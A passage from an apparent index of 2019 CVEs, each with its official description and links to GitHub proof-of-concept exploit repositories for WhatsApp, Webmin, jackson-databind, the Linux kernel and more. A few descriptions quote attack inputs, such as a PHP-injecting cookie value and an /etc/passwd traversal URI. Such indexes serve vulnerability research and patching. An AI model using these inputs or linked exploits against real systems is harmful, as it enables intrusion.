[MauroEldritch/VanCleef](https://github.com/MauroEldritch/VanCleef) + +### CVE-2019-11931 (2019-11-14) + +A stack-based buffer overflow could be triggered in WhatsApp by sending a specially crafted MP4 file to a WhatsApp user. The issue was present in parsing the elementary stream metadata of an MP4 file and could result in a DoS or RCE. This affects Android versions prior to 2.19.274, iOS versions prior to 2.19.100, Enterprise Client versions prior to 2.25.3, Business for Android versions prior to 2.19.104 and Business for iOS versions prior to 2.19.100. + + +- [kasif-dekel/whatsapp-rce-patched](https://github.com/kasif-dekel/whatsapp-rce-patched) +- [nop-team/CVE-2019-11931](https://github.com/nop-team/CVE-2019-11931) + +### CVE-2019-11932 (2019-10-03) + +A double free vulnerability in the DDGifSlurp function in decoding.c in the android-gif-drawable library before version 1.2.18, as used in WhatsApp for Android before version 2.19.244 and many other Android applications, allows remote attackers to execute arbitrary code or cause a denial of service when the library is used to parse a specially crafted GIF image. + + +- [dorkerdevil/CVE-2019-11932](https://github.com/dorkerdevil/CVE-2019-11932) +- [awakened1712/CVE-2019-11932](https://github.com/awakened1712/CVE-2019-11932) +- [JasonJerry/WhatsRCE](https://github.com/JasonJerry/WhatsRCE) +- [TulungagungCyberLink/CVE-2019-11932](https://github.com/TulungagungCyberLink/CVE-2019-11932) +- [infiniteLoopers/CVE-2019-11932](https://github.com/infiniteLoopers/CVE-2019-11932) +- [valbrux/CVE-2019-11932-SupportApp](https://github.com/valbrux/CVE-2019-11932-SupportApp) +- [fastmo/CVE-2019-11932](https://github.com/fastmo/CVE-2019-11932) +- [mRanonyMousTZ/CVE-2019-11932-whatsApp-exploit](https://github.com/mRanonyMousTZ/CVE-2019-11932-whatsApp-exploit) +- [SmoZy92/CVE-2019-11932](https://github.com/SmoZy92/CVE-2019-11932) +- [dashtic172/https-github.com-awakened171](https://github.com/dashtic172/https-github.com-awakened171) +- [Err0r-ICA/WhatsPayloadRCE](https://github.com/Err0r-ICA/WhatsPayloadRCE) +- [starling021/CVE-2019-11932-SupportApp](https://github.com/starling021/CVE-2019-11932-SupportApp) +- [primebeast/CVE-2019-11932](https://github.com/primebeast/CVE-2019-11932) +- [BadAssAiras/hello](https://github.com/BadAssAiras/hello) +- [kal1gh0st/WhatsAppHACK-RCE](https://github.com/kal1gh0st/WhatsAppHACK-RCE) +- [zxn1/CVE-2019-11932](https://github.com/zxn1/CVE-2019-11932) +- [k3vinlusec/WhatsApp-Double-Free-Vulnerability_CVE-2019-11932](https://github.com/k3vinlusec/WhatsApp-Double-Free-Vulnerability_CVE-2019-11932) +- [Tabni/https-github.com-awakened1712-CVE-2019-11932](https://github.com/Tabni/https-github.com-awakened1712-CVE-2019-11932) +- [0759104103/cd-CVE-2019-11932](https://github.com/0759104103/cd-CVE-2019-11932) +- [tucommenceapousser/CVE-2019-11932](https://github.com/tucommenceapousser/CVE-2019-11932) +- [tucommenceapousser/CVE-2019-11932deta](https://github.com/tucommenceapousser/CVE-2019-11932deta) + +### CVE-2019-11933 (2019-10-23) + +A heap buffer overflow bug in libpl_droidsonroids_gif before 1.2.19, as used in WhatsApp for Android before version 2.19.291 could allow remote attackers to execute arbitrary code or cause a denial of service. + + +- [NatleoJ/CVE-2019-11933](https://github.com/NatleoJ/CVE-2019-11933) +- [KISH84172/CVE-2019-11933](https://github.com/KISH84172/CVE-2019-11933) + +### CVE-2019-12086 (2019-05-17) + +A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation. + + +- [motoyasu-saburi/CVE-2019-12086-jackson-databind-file-read](https://github.com/motoyasu-saburi/CVE-2019-12086-jackson-databind-file-read) +- [Al1ex/CVE-2019-12086](https://github.com/Al1ex/CVE-2019-12086) + +### CVE-2019-12169 (2019-06-03) + +ATutor 2.2.4 allows Arbitrary File Upload and Directory Traversal, resulting in remote code execution via a ".." pathname in a ZIP archive to the mods/_core/languages/language_import.php (aka Import New Language) or mods/_standard/patcher/index_admin.php (aka Patcher) component. + + +- [fuzzlove/ATutor-2.2.4-Language-Exploit](https://github.com/fuzzlove/ATutor-2.2.4-Language-Exploit) + +### CVE-2019-12170 (2019-05-17) + +ATutor through 2.2.4 is vulnerable to arbitrary file uploads via the mods/_core/backups/upload.php (aka backup) component. This may result in remote command execution. An attacker can use the instructor account to fully compromise the system using a crafted backup ZIP archive. This will allow for PHP files to be written to the web root, and for code to execute on the remote server. + + +- [fuzzlove/ATutor-Instructor-Backup-Arbitrary-File](https://github.com/fuzzlove/ATutor-Instructor-Backup-Arbitrary-File) + +### CVE-2019-12180 (2020-02-05) + +An issue was discovered in SmartBear ReadyAPI through 2.8.2 and 3.0.0 and SoapUI through 5.5. When opening a project, the Groovy "Load Script" is automatically executed. This allows an attacker to execute arbitrary Groovy Language code (Java scripting language) on the victim machine by inducing it to open a malicious Project. The same issue is present in the "Save Script" function, which is executed automatically when saving a project. + + +- [0x-nope/CVE-2019-12180](https://github.com/0x-nope/CVE-2019-12180) + +### CVE-2019-12181 (2019-06-17) + +A privilege escalation vulnerability exists in SolarWinds Serv-U before 15.1.7 for Linux. + + +- [mavlevin/CVE-2019-12181](https://github.com/mavlevin/CVE-2019-12181) + +### CVE-2019-12185 (2019-05-19) + +eLabFTW 1.8.5 is vulnerable to arbitrary file uploads via the /app/controllers/EntityController.php component. This may result in remote command execution. An attacker can use a user account to fully compromise the system using a POST request. This will allow for PHP files to be written to the web root, and for code to execute on the remote server. + + +- [fuzzlove/eLabFTW-1.8.5-EntityController-Arbitrary-File-Upload-RCE](https://github.com/fuzzlove/eLabFTW-1.8.5-EntityController-Arbitrary-File-Upload-RCE) + +### CVE-2019-12189 (2019-05-21) + +An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do search field. + + +- [falconz/CVE-2019-12189](https://github.com/falconz/CVE-2019-12189) + +### CVE-2019-12255 (2019-08-09) + +Wind River VxWorks has a Buffer Overflow in the TCP component (issue 1 of 4). This is a IPNET security vulnerability: TCP Urgent Pointer = 0 that leads to an integer underflow. + + +- [sud0woodo/Urgent11-Suricata-LUA-scripts](https://github.com/sud0woodo/Urgent11-Suricata-LUA-scripts) + +### CVE-2019-12272 (2019-05-23) + +In OpenWrt LuCI through 0.10, the endpoints admin/status/realtime/bandwidth_status and admin/status/realtime/wireless_status of the web application are affected by a command injection vulnerability. + + +- [HACHp1/LuCI_RCE_exp](https://github.com/HACHp1/LuCI_RCE_exp) +- [nevercodecorrect/lede-17.01.3](https://github.com/nevercodecorrect/lede-17.01.3) + +### CVE-2019-12314 (2019-05-24) + +Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI. + + +- [ras313/CVE-2019-12314](https://github.com/ras313/CVE-2019-12314) + +### CVE-2019-12384 (2019-06-24) + +FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible. + + +- [jas502n/CVE-2019-12384](https://github.com/jas502n/CVE-2019-12384) +- [MagicZer0/Jackson_RCE-CVE-2019-12384](https://github.com/MagicZer0/Jackson_RCE-CVE-2019-12384) + +### CVE-2019-12409 (2019-11-18) + +The 8.1.1 and 8.2.0 releases of Apache Solr contain an insecure setting for the ENABLE_REMOTE_JMX_OPTS configuration option in the default solr.in.sh configuration file shipping with Solr. If you use the default solr.in.sh file from the affected releases, then JMX monitoring will be enabled and exposed on RMI_PORT (default=18983), without any authentication. If this port is opened for inbound traffic in your firewall, then anyone with network access to your Solr nodes will be able to access JMX, which may in turn allow them to upload malicious code for execution on the Solr server. + + +- [jas502n/CVE-2019-12409](https://github.com/jas502n/CVE-2019-12409) + +### CVE-2019-12422 (2019-11-18) + +Apache Shiro before 1.4.2, when using the default "remember me" configuration, cookies could be susceptible to a padding attack. + + +- [BaiHLiu/RuoYI-4.2-Shiro-721-Docker-PoC](https://github.com/BaiHLiu/RuoYI-4.2-Shiro-721-Docker-PoC) + +### CVE-2019-12453 (2019-07-19) + +In MicroStrategy Web before 10.1 patch 10, stored XSS is possible in the FLTB parameter due to missing input validation. + + +- [undefinedmode/CVE-2019-12453](https://github.com/undefinedmode/CVE-2019-12453) + +### CVE-2019-12460 (2019-05-30) + +Web Port 1.19.1 allows XSS via the /access/setup type parameter. + + +- [EmreOvunc/WebPort-v1.19.1-Reflected-XSS](https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS) + +### CVE-2019-12475 (2019-07-17) + +In MicroStrategy Web before 10.4.6, there is stored XSS in metric due to insufficient input validation. + + +- [undefinedmode/CVE-2019-12475](https://github.com/undefinedmode/CVE-2019-12475) + +### CVE-2019-12476 (2019-06-17) + +An authentication bypass vulnerability in the password reset functionality in Zoho ManageEngine ADSelfService Plus before 5.0.6 allows an attacker with physical access to gain a shell with SYSTEM privileges via the restricted thick client browser. The attack uses a long sequence of crafted keyboard input. + + +- [0katz/CVE-2019-12476](https://github.com/0katz/CVE-2019-12476) + +### CVE-2019-12489 (2019-11-26) + +An issue was discovered on Fastweb Askey RTV1907VW 0.00.81_FW_200_Askey 2018-10-02 18:08:18 devices. By using the usb_remove service through an HTTP request, it is possible to inject and execute a command between two & characters in the mount parameter. + + +- [garis/Fastgate](https://github.com/garis/Fastgate) + +### CVE-2019-12538 (2019-06-05) + +An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do search field. + + +- [tarantula-team/CVE-2019-12538](https://github.com/tarantula-team/CVE-2019-12538) + +### CVE-2019-12541 (2019-06-05) + +An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SolutionSearch.do searchText parameter. + + +- [tarantula-team/CVE-2019-12541](https://github.com/tarantula-team/CVE-2019-12541) + +### CVE-2019-12542 (2019-06-05) + +An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter. + + +- [tarantula-team/CVE-2019-12542](https://github.com/tarantula-team/CVE-2019-12542) + +### CVE-2019-12543 (2019-06-05) + +An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter. + + +- [tarantula-team/CVE-2019-12543](https://github.com/tarantula-team/CVE-2019-12543) + +### CVE-2019-12562 (2019-09-26) + +Stored Cross-Site Scripting in DotNetNuke (DNN) Version before 9.4.0 allows remote attackers to store and embed the malicious script into the admin notification page. The exploit could be used to perfom any action with admin privileges such as managing content, adding users, uploading backdoors to the server, etc. Successful exploitation occurs when an admin user visits a notification page with stored cross-site scripting. + + +- [MAYASEVEN/CVE-2019-12562](https://github.com/MAYASEVEN/CVE-2019-12562) + +### CVE-2019-12586 (2019-09-04) + +The EAP peer implementation in Espressif ESP-IDF 2.0.0 through 4.0.0 and ESP8266_NONOS_SDK 2.2.0 through 3.1.0 processes EAP Success messages before any EAP method completion or failure, which allows attackers in radio range to cause a denial of service (crash) via a crafted message. + + +- [Matheus-Garbelini/esp32_esp8266_attacks](https://github.com/Matheus-Garbelini/esp32_esp8266_attacks) + +### CVE-2019-12594 (2019-07-02) + +DOSBox 0.74-2 has Incorrect Access Control. + + +- [Alexandre-Bartel/CVE-2019-12594](https://github.com/Alexandre-Bartel/CVE-2019-12594) + +### CVE-2019-12616 (2019-06-05) + +An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim. + + +- [Cappricio-Securities/CVE-2019-12616](https://github.com/Cappricio-Securities/CVE-2019-12616) + +### CVE-2019-12725 (2019-07-19) + +Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters. + + +- [givemefivw/CVE-2019-12725](https://github.com/givemefivw/CVE-2019-12725) +- [sma11new/PocList](https://github.com/sma11new/PocList) +- [hev0x/CVE-2019-12725-Command-Injection](https://github.com/hev0x/CVE-2019-12725-Command-Injection) +- [gougou123-hash/CVE-2019-12725](https://github.com/gougou123-hash/CVE-2019-12725) + +### CVE-2019-12735 (2019-06-05) + +getchar.c in Vim before 8.1.1365 and Neovim before 0.3.6 allows remote attackers to execute arbitrary OS commands via the :source! command in a modeline, as demonstrated by execute in Vim, and assert_fails or nvim_input in Neovim. + + +- [pcy190/ace-vim-neovim](https://github.com/pcy190/ace-vim-neovim) +- [oldthree3/CVE-2019-12735-VIM-NEOVIM](https://github.com/oldthree3/CVE-2019-12735-VIM-NEOVIM) +- [datntsec/CVE-2019-12735](https://github.com/datntsec/CVE-2019-12735) +- [nickylimjj/cve-2019-12735](https://github.com/nickylimjj/cve-2019-12735) +- [st9007a/CVE-2019-12735](https://github.com/st9007a/CVE-2019-12735) + +### CVE-2019-12744 (2019-06-20) + +SeedDMS before 5.1.11 allows Remote Command Execution (RCE) because of unvalidated file upload of PHP scripts, a different vulnerability than CVE-2018-12940. + + +- [nobodyatall648/CVE-2019-12744](https://github.com/nobodyatall648/CVE-2019-12744) + +### CVE-2019-12750 (2019-07-31) + +Symantec Endpoint Protection, prior to 14.2 RU1 & 12.1 RU6 MP10 and Symantec Endpoint Protection Small Business Edition, prior to 12.1 RU6 MP10c (12.1.7491.7002), may be susceptible to a privilege escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user. + + +- [v-p-b/cve-2019-12750](https://github.com/v-p-b/cve-2019-12750) + +### CVE-2019-12796 +- [PeterUpfold/CVE-2019-12796](https://github.com/PeterUpfold/CVE-2019-12796) + +### CVE-2019-12814 (2019-06-19) + +A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server. + + +- [Al1ex/CVE-2019-12814](https://github.com/Al1ex/CVE-2019-12814) + +### CVE-2019-12815 (2019-07-19) + +An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306. + + +- [KTN1990/CVE-2019-12815](https://github.com/KTN1990/CVE-2019-12815) +- [lcartey/proftpd-cve-2019-12815](https://github.com/lcartey/proftpd-cve-2019-12815) + +### CVE-2019-12836 (2019-06-21) + +The Bobronix JEditor editor before 3.0.6 for Jira allows an attacker to add a URL/Link (to an existing issue) that can cause forgery of a request to an out-of-origin domain. This in turn may allow for a forged request that can be invoked in the context of an authenticated user, leading to stealing of session tokens and account takeover. + + +- [9lyph/CVE-2019-12836](https://github.com/9lyph/CVE-2019-12836) + +### CVE-2019-12840 (2019-06-15) + +In Webmin through 1.910, any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi. + + +- [bkaraceylan/CVE-2019-12840_POC](https://github.com/bkaraceylan/CVE-2019-12840_POC) +- [KrE80r/webmin_cve-2019-12840_poc](https://github.com/KrE80r/webmin_cve-2019-12840_poc) +- [anasbousselham/webminscan](https://github.com/anasbousselham/webminscan) +- [zAbuQasem/CVE-2019-12840](https://github.com/zAbuQasem/CVE-2019-12840) +- [WizzzStark/CVE-2019-12840.py](https://github.com/WizzzStark/CVE-2019-12840.py) +- [Pol-Ruiz/PoC-CVE-2019-12840](https://github.com/Pol-Ruiz/PoC-CVE-2019-12840) + +### CVE-2019-12889 (2019-08-20) + +An unauthenticated privilege escalation exists in SailPoint Desktop Password Reset 7.2. A user with local access to only the Windows logon screen can escalate their privileges to NT AUTHORITY\System. An attacker would need local access to the machine for a successful exploit. The attacker must disconnect the computer from the local network / WAN and connect it to an internet facing access point / network. At that point, the attacker can execute the password-reset functionality, which will expose a web browser. Browsing to a site that calls local Windows system functions (e.g., file upload) will expose the local file system. From there an attacker can launch a privileged command shell. + + +- [nulsect0r/CVE-2019-12889](https://github.com/nulsect0r/CVE-2019-12889) + +### CVE-2019-12890 (2019-06-19) + +RedwoodHQ 2.5.5 does not require any authentication for database operations, which allows remote attackers to create admin users via a con.automationframework users insert_one call. + + +- [EthicalHCOP/CVE-2019-12890_RedxploitHQ](https://github.com/EthicalHCOP/CVE-2019-12890_RedxploitHQ) + +### CVE-2019-12937 (2019-06-23) + +apps/gsudo.c in gsudo in ToaruOS through 1.10.9 has a buffer overflow allowing local privilege escalation to the root user via the DISPLAY environment variable. + + +- [AkashicYiTai/CVE-2019-12937-ToaruOS](https://github.com/AkashicYiTai/CVE-2019-12937-ToaruOS) + +### CVE-2019-12949 (2019-06-25) + +In pfSense 2.4.4-p2 and 2.4.4-p3, if it is possible to trick an authenticated administrator into clicking on a button on a phishing page, an attacker can leverage XSS to upload arbitrary executable code, via diag_command.php and rrd_fetch_json.php (timePeriod parameter), to a server. Then, the remote attacker can run any command with root privileges on that server. + + +- [tarantula-team/CVE-2019-12949](https://github.com/tarantula-team/CVE-2019-12949) + +### CVE-2019-12999 (2020-01-31) + +Lightning Network Daemon (lnd) before 0.7 allows attackers to trigger loss of funds because of Incorrect Access Control. + + +- [lightninglabs/chanleakcheck](https://github.com/lightninglabs/chanleakcheck) + +### CVE-2019-13000 (2020-01-31) + +Eclair through 0.3 allows attackers to trigger loss of funds because of Incorrect Access Control. NOTE: README.md states "it is beta-quality software and don't put too much money in it." + + +- [ACINQ/detection-tool-cve-2019-13000](https://github.com/ACINQ/detection-tool-cve-2019-13000) + +### CVE-2019-13024 (2019-07-01) + +Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29 allows the attacker to execute arbitrary system commands by using the value "init_script"-"Monitoring Engine Binary" in main.get.php to insert a arbitrary command into the database, and execute it by calling the vulnerable page www/include/configuration/configGenerate/xml/generateFiles.php (which passes the inserted value to the database to shell_exec without sanitizing it, allowing one to execute system arbitrary commands). + + +- [mhaskar/CVE-2019-13024](https://github.com/mhaskar/CVE-2019-13024) +- [get-get-get-get/Centreon-RCE](https://github.com/get-get-get-get/Centreon-RCE) + +### CVE-2019-13025 (2019-10-02) + +Compal CH7465LG CH7465LG-NCIP-6.12.18.24-5p8-NOSH devices have Incorrect Access Control because of Improper Input Validation. The attacker can send a maliciously modified POST (HTTP) request containing shell commands, which will be executed on the device, to an backend API endpoint of the cable modem. + + +- [x1tan/CVE-2019-13025](https://github.com/x1tan/CVE-2019-13025) + +### CVE-2019-13027 (2019-07-12) + +Realization Concerto Critical Chain Planner (aka CCPM) 5.10.8071 has SQL Injection in at least in the taskupdt/taskdetails.aspx webpage via the projectname parameter. + + +- [IckoGZ/CVE-2019-13027](https://github.com/IckoGZ/CVE-2019-13027) + +### CVE-2019-13051 (2019-10-09) + +Pi-Hole 4.3 allows Command Injection. + + +- [pr0tean/CVE-2019-13051](https://github.com/pr0tean/CVE-2019-13051) + +### CVE-2019-13063 (2019-09-23) + +Within Sahi Pro 8.0.0, an attacker can send a specially crafted URL to include any victim files on the system via the script parameter on the Script_view page. This will result in file disclosure (i.e., being able to pull any file from the remote victim application). This can be used to steal and obtain sensitive config and other files. This can result in complete compromise of the application. The script parameter is vulnerable to directory traversal and both local and remote file inclusion. + + +- [0x6b7966/CVE-2019-13063-POC](https://github.com/0x6b7966/CVE-2019-13063-POC) + +### CVE-2019-13086 (2019-06-30) + +core/MY_Security.php in CSZ CMS 1.2.2 before 2019-06-20 has member/login/check SQL injection by sending a crafted HTTP User-Agent header and omitting the csrf_csz parameter. + + +- [lingchuL/CVE_POC_test](https://github.com/lingchuL/CVE_POC_test) + +### CVE-2019-13101 (2019-08-08) + +An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page. + + +- [halencarjunior/dlkploit600](https://github.com/halencarjunior/dlkploit600) + +### CVE-2019-13115 (2019-07-16) + +In libssh2 before 1.9.0, kex_method_diffie_hellman_group_exchange_sha256_key_exchange in kex.c has an integer overflow that could lead to an out-of-bounds read in the way packets are read from the server. A remote attacker who compromises a SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server. This is related to an _libssh2_check_length mistake, and is different from the various issues fixed in 1.8.1, such as CVE-2019-3855. + + +- [viz27/Libssh2-Exploit](https://github.com/viz27/Libssh2-Exploit) +- [CSSProject/libssh2-Exploit](https://github.com/CSSProject/libssh2-Exploit) + +### CVE-2019-13143 (2019-08-06) + +An HTTP parameter pollution issue was discovered on Shenzhen Dragon Brothers Fingerprint Bluetooth Round Padlock FB50 2.3. With the user ID, user name, and the lock's MAC address, anyone can unbind the existing owner of the lock, and bind themselves instead. This leads to complete takeover of the lock. The user ID, name, and MAC address are trivially obtained from APIs found within the Android or iOS application. With only the MAC address of the lock, any attacker can transfer ownership of the lock from the current user, over to the attacker's account. Thus rendering the lock completely inaccessible to the current user. + + +- [securelayer7/pwnfb50](https://github.com/securelayer7/pwnfb50) + +### CVE-2019-13144 (2019-07-05) + +myTinyTodo 1.3.3 through 1.4.3 allows CSV Injection. This is fixed in 1.5. + + +- [cccaaasser/CVE-2019-13144](https://github.com/cccaaasser/CVE-2019-13144) + +### CVE-2019-13272 (2019-07-17) + +In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit's pkexec helper with PTRACE_TRACEME. NOTE: SELinux deny_ptrace might be a usable workaround in some environments. + + +- [jas502n/CVE-2019-13272](https://github.com/jas502n/CVE-2019-13272) +- [Cyc1eC/CVE-2019-13272](https://github.com/Cyc1eC/CVE-2019-13272) +- [bigbigliang-malwarebenchmark/cve-2019-13272](https://github.com/bigbigliang-malwarebenchmark/cve-2019-13272) +- [oneoy/CVE-2019-13272](https://github.com/oneoy/CVE-2019-13272) +- [polosec/CVE-2019-13272](https://github.com/polosec/CVE-2019-13272) +- [sumedhaDharmasena/-Kernel-ptrace-c-mishandles-vulnerability-CVE-2019-13272](https://github.com/sumedhaDharmasena/-Kernel-ptrace-c-mishandles-vulnerability-CVE-2019-13272) +- [Tharana/Exploiting-a-Linux-kernel-vulnerability](https://github.com/Tharana/Exploiting-a-Linux-kernel-vulnerability) +- [RashmikaEkanayake/Privilege-Escalation-CVE-2019-13272-](https://github.com/RashmikaEkanayake/Privilege-Escalation-CVE-2019-13272-) +- [Tharana/vulnerability-exploitation](https://github.com/Tharana/vulnerability-exploitation) +- [teddy47/CVE-2019-13272---Documentation](https://github.com/teddy47/CVE-2019-13272---Documentation) +- [datntsec/CVE-2019-13272](https://github.com/datntsec/CVE-2019-13272) +- [jana30116/CVE-2019-13272-Local-Privilege-Escalation](https://github.com/jana30116/CVE-2019-13272-Local-Privilege-Escalation) +- [babyshen/CVE-2019-13272](https://github.com/babyshen/CVE-2019-13272) +- [GgKendall/secureCodingDemo](https://github.com/GgKendall/secureCodingDemo) +- [asepsaepdin/CVE-2019-13272](https://github.com/asepsaepdin/CVE-2019-13272) +- [MDS1GNAL/ptrace_scope-CVE-2019-13272-privilege-escalation](https://github.com/MDS1GNAL/ptrace_scope-CVE-2019-13272-privilege-escalation) +- [josemlwdf/CVE-2019-13272](https://github.com/josemlwdf/CVE-2019-13272) + +### CVE-2019-13288 (2019-07-04) + +In Xpdf 4.01.01, the Parser::getObj() function in Parser.cc may cause infinite recursion via a crafted file. A remote attacker can leverage this for a DoS attack. This is similar to CVE-2018-16646. + + +- [gleaming0/CVE-2019-13288](https://github.com/gleaming0/CVE-2019-13288) +- [Fineas/CVE-2019-13288-POC](https://github.com/Fineas/CVE-2019-13288-POC) + +### CVE-2019-13292 (2019-07-04) + +A SQL Injection issue was discovered in webERP 4.15. Payments.php accepts payment data in base64 format. After this is decoded, it is deserialized. Then, this deserialized data goes directly into a SQL query, with no sanitizing checks. + + +- [gustanini/CVE-2019-13292-WebERP_4.15](https://github.com/gustanini/CVE-2019-13292-WebERP_4.15) + +### CVE-2019-13361 (2019-09-05) + +Smanos W100 1.0.0 devices have Insecure Permissions, exploitable by an attacker on the same Wi-Fi network. + + +- [lodi-g/CVE-2019-13361](https://github.com/lodi-g/CVE-2019-13361) + +### CVE-2019-13403 (2019-07-17) + +Temenos CWX version 8.9 has an Broken Access Control vulnerability in the module /CWX/Employee/EmployeeEdit2.aspx, leading to the viewing of user information. + + +- [B3Bo1d/CVE-2019-13403](https://github.com/B3Bo1d/CVE-2019-13403) + +### CVE-2019-13496 (2019-11-04) + +One Identity Cloud Access Manager before 8.1.4 Hotfix 1 allows OTP bypass via vectors involving a man in the middle, the One Identity Defender product, and replacing a failed SAML response with a successful SAML response. + + +- [FurqanKhan1/CVE-2019-13496](https://github.com/FurqanKhan1/CVE-2019-13496) + +### CVE-2019-13497 (2019-11-04) + +One Identity Cloud Access Manager before 8.1.4 Hotfix 1 allows CSRF for logout requests. + + +- [FurqanKhan1/CVE-2019-13497](https://github.com/FurqanKhan1/CVE-2019-13497) + +### CVE-2019-13498 (2019-07-29) + +One Identity Cloud Access Manager 8.1.3 does not use HTTP Strict Transport Security (HSTS), which may allow man-in-the-middle (MITM) attacks. This issue is fixed in version 8.1.4. + + +- [FurqanKhan1/CVE-2019-13498](https://github.com/FurqanKhan1/CVE-2019-13498) + +### CVE-2019-13574 (2019-07-12) + +In lib/mini_magick/image.rb in MiniMagick before 4.9.4, a fetched remote image filename could cause remote command execution because Image.open input is directly passed to Kernel#open, which accepts a '|' character followed by a command. + + +- [masahiro331/CVE-2019-13574](https://github.com/masahiro331/CVE-2019-13574) + +### CVE-2019-13633 (2020-10-19) + +Blinger.io v.1.0.2519 is vulnerable to Blind/Persistent XSS. An attacker can send arbitrary JavaScript code via a built-in communication channel, such as Telegram, WhatsApp, Viber, Skype, Facebook, Vkontakte, or Odnoklassniki. This is mishandled within the administration panel for conversations/all, conversations/inbox, conversations/unassigned, and conversations/closed. + + +- [Security-AVS/CVE-2019-13633](https://github.com/Security-AVS/CVE-2019-13633) + +### CVE-2019-13720 (2019-11-25) + +Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [cve-2019-13720/cve-2019-13720](https://github.com/cve-2019-13720/cve-2019-13720) +- [ChoKyuWon/CVE-2019-13720](https://github.com/ChoKyuWon/CVE-2019-13720) + +### CVE-2019-13764 (2019-12-10) + +Type confusion in JavaScript in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [HaboobLab/CVE-2019-13764](https://github.com/HaboobLab/CVE-2019-13764) + +### CVE-2019-13956 (2019-07-18) + +Discuz!ML 3.2 through 3.4 allows remote attackers to execute arbitrary PHP code via a modified language cookie, as demonstrated by changing 4gH4_0df5_language=en to 4gH4_0df5_language=en'.phpinfo().'; (if the random prefix 4gH4_0df5_ were used). + + +- [rhbb/CVE-2019-13956](https://github.com/rhbb/CVE-2019-13956) + +### CVE-2019-13990 (2019-07-26) + +initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description. + + +- [epicosy/Quartz-1](https://github.com/epicosy/Quartz-1) + +### CVE-2019-14040 (2020-02-07) + +Using memory after being freed in qsee due to wrong implementation can lead to unexpected behavior such as execution of unknown code in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, MDM9150, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, MSM8998, QCS605, QM215, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SDX24, SM8150, SXR1130 + + +- [tamirzb/CVE-2019-14040](https://github.com/tamirzb/CVE-2019-14040) + +### CVE-2019-14041 (2020-02-07) + +During listener modified response processing, a buffer overrun occurs due to lack of buffer size verification when updating message buffer with physical address information in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8917, MSM8953, MSM8996AU, Nicobar, QCM2150, QCS405, QCS605, QM215, Rennell, SA6155P, Saipan, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM632, SDM670, SDM710, SDM845, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130 + + +- [tamirzb/CVE-2019-14041](https://github.com/tamirzb/CVE-2019-14041) + +### CVE-2019-14079 (2020-03-05) + +Access to the uninitialized variable when the driver tries to unmap 